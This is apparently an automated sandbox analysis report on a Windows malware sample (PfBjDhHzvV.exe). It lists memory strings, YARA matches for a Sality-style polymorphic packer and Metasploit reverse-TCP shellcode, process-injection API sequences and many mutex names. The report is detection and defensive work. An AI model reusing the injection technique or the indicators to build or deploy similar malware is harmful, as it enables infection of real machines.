            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
            Source: SearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/finance?OCID=WSB_TL_FN&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/news?OCID=WSB_QS_NE&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/spartan/dhp_l
            Source: SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/spartan/mmxh
            Source: SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/spartan/ntp0N
            Source: SearchApp.exe, 0000000F.00000000.1546935176.000001EC9A1DA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/spartan/ntpI
            Source: SearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/sports?OCID=WSB_TL_EL&PC=wsbmsnqs
            Source: SearchApp.exe, 0000000F.00000000.1563317875.000001F49B760000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1643340577.000001F4AFCC0000.00000004.00000001.00040000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1604664834.000001F4AE8E1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com/weather?OCID=WSB_QS_WE&PC=wsbmsnqs
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.2800092520.00000000071FC000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com:443/en-us/feed
            Source: SearchApp.exe, 0000000F.00000000.1567010034.000001F49BDBF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.ng.com
            Source: explorer.exe, 0000000A.00000000.1446640101.00000000071B2000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.pollensense.com/
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1563634217.000001F49B87D000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://xsts.auth.xboxlive.com
            Source: svchost.exe, 00000007.00000000.1425729414.0000018CE72A9000.00000004.00000001.00020000.00000000.sdmp, SearchApp.exe, 0000000F.00000000.1568868913.000001F49D27C000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://xsts.auth.xboxlive.com/
            Source: SearchApp.exe, 0000000F.00000000.1562812972.000001F49B644000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://xsts.auth.xboxlive.comey
            Source: SearchApp.exe, 0000000F.00000000.1674049246.000001F4B3224000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://xsts.auth.xboxlive.commy

            System Summary

            Source: 0.2.PfBjDhHzvV.exe.1280cc4.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
            Source: 35.2.faawXJQQDELvfTymNiVz.exe.28a0cc4.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
            Source: 35.2.faawXJQQDELvfTymNiVz.exe.2880000.4.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
            Source: 0.2.PfBjDhHzvV.exe.1260000.5.unpack, type: UNPACKEDPE Matched rule: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality Author: ditekSHen
            Source: 0.2.PfBjDhHzvV.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
            Source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
            Source: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
            Source: 00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Identifies Metasploit 64 bit reverse tcp shellcode. Author: unknown
            Source: PfBjDhHzvV.exe Static PE information: section name:
            Source: PfBjDhHzvV.exe Static PE information: section name:
            Source: PfBjDhHzvV.exe Static PE information: section name:
            Source: PfBjDhHzvV.exe Static PE information: section name:
            Source: xjjalq.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: xlroe.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: taqcpb.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: winysum.exe.35.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: winbwxmuq.exe.35.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Process Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe File created: C:\Windows\46c927
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe File deleted: C:\Windows\46c927
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Code function: 0_2_0128E329
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Code function: 0_2_0128B614
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Code function: 0_2_01296CD0
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 29_2_02410386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 30_2_02290386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 31_2_00950386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 32_2_00BF0386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 33_2_00340386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 34_2_01490386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 35_2_028AE329
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 35_2_028B6CD0
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 35_2_028AB614
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 35_2_02470386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 36_2_00F60386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 37_2_021D0386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 38_2_02930386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 39_2_00840386
            Source: C:\Program Files (x86)\PSXwxkWcZosELFjnJGKPiIpXFDAgGWUYhvqJQImIunbGuwnXQfmxHJ\faawXJQQDELvfTymNiVz.exe Code function: 40_2_02460386
            Source: Joe Sandbox View Dropped File: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe F2DE2A37E6DFC90FFD0162EF11A7C9792850E37767B1E2C5AD28C751D18D750F
            Source: msedge.exe.0.dr Static PE information: Number of sections : 14 > 10
            Source: PfBjDhHzvV.exe Binary or memory string: OriginalFilename vs PfBjDhHzvV.exe
            Source: PfBjDhHzvV.exe, 00000000.00000002.2234177696.0000000000415000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameab.exeF vs PfBjDhHzvV.exe
            Source: PfBjDhHzvV.exe, 00000000.00000002.2234330420.0000000000417000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameab.exeF vs PfBjDhHzvV.exe
            Source: PfBjDhHzvV.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: 0.2.PfBjDhHzvV.exe.1280cc4.6.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
            Source: 35.2.faawXJQQDELvfTymNiVz.exe.28a0cc4.5.raw.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
            Source: 35.2.faawXJQQDELvfTymNiVz.exe.2880000.4.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
            Source: 0.2.PfBjDhHzvV.exe.1260000.5.unpack, type: UNPACKEDPE Matched rule: INDICATOR_EXE_Packed_SimplePolyEngine author = ditekSHen, description = Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality
            Source: 0.2.PfBjDhHzvV.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
            Source: 00000000.00000003.1375059861.0000000004500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
            Source: 00000000.00000002.2246784875.0000000004FD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
            Source: 00000000.00000002.2233936236.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_Metasploit_4a1c4da8 reference_sample = 9582d37ed9de522472abe615dedef69282a40cfd58185813c1215249c24bbf22, os = windows, severity = x86, description = Identifies Metasploit 64 bit reverse tcp shellcode., creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = 7a31ce858215f0a8732ce6314bfdbc3975f1321e3f87d7f4dc5a525f15766987, id = 4a1c4da8-837d-4ad1-a672-ddb8ba074936, last_modified = 2021-08-23
            Source: xjjalq.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: xlroe.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: taqcpb.exe.0.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: winysum.exe.35.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: winbwxmuq.exe.35.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_LOCKED, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: xlroe.exe.0.dr Static PE information: Section .text
            Source: xjjalq.exe.0.dr Static PE information: Section .text
            Source: winbwxmuq.exe.35.dr Static PE information: Section .text
            Source: winysum.exe.35.dr Static PE information: Section .text
            Source: taqcpb.exe.0.dr Static PE information: Section .text
            Source: classification engine Classification label: mal100.spre.troj.evad.winEXE@3/34@1/51
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Code function: 0_2_01291EF6 OpenProcess,GetLastError,GetVersionExA,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,GetLastError,CloseHandle,OpenProcess,AdjustTokenPrivileges,CloseHandle,OpenProcessToken,GetTokenInformation,GetLastError,GetProcessHeap,RtlAllocateHeap,GetTokenInformation,LookupAccountSidA,lstrcmpiA,lstrcmpiA,lstrcmpiA,CreateMutexA,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,VirtualAllocEx,lstrlen,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,GetProcessHeap,HeapFree
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Code function: 0_2_01292514 CreateToolhelp32Snapshot,Process32First,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,Process32Next,lstrlen,lstrcpyn,lstrcpy,CharLowerA,lstrlen,wsprintfA,CreateMutexA,GetLastError,ReleaseMutex,CloseHandle,CloseHandle
            Source: C:\Windows\System32\svchost.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_19_0.png
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_4028_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2572_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\csrss.exeM_412_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_180_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\applicationframehost.exeM_3496_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\upfc.exeM_4064_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2648_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\conhost.exeM_700_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\officeclicktorun.exeM_2596_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1240_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6152_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6180_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5836_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_5420_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2424_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1212_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_912_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5880_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_7160_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5076_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5852_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6900_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1852_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5292_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6516_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3524_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\wmiprvse.exeM_6232_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6124_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4452_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\searchapp.exeM_4972_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2756_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\lsass.exeM_632_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2948_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5116_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3888_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2080_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1788_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2440_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\smss.exeM_328_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\runtimebroker.exeM_4844_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4348_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6228_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_968_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\fontdrvhost.exeM_780_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_6640_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\uxJLpe1m
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_2856_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\startmenuexperiencehost.exeM_4756_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_356_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_5668_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1064_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3740_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_3396_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1496_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2668_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_3784_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_4040_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_7292_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2656_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1460_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\faawxjqqdelvftymnivz.exeM_1456_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_748_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_2248_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\svchost.exeM_1080_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\dllhost.exeM_5512_
            Source: C:\Users\user\Desktop\PfBjDhHzvV.exe Mutant created: \Sessions\1\BaseNamedObjects\shellexperiencehost.exeM_7984_
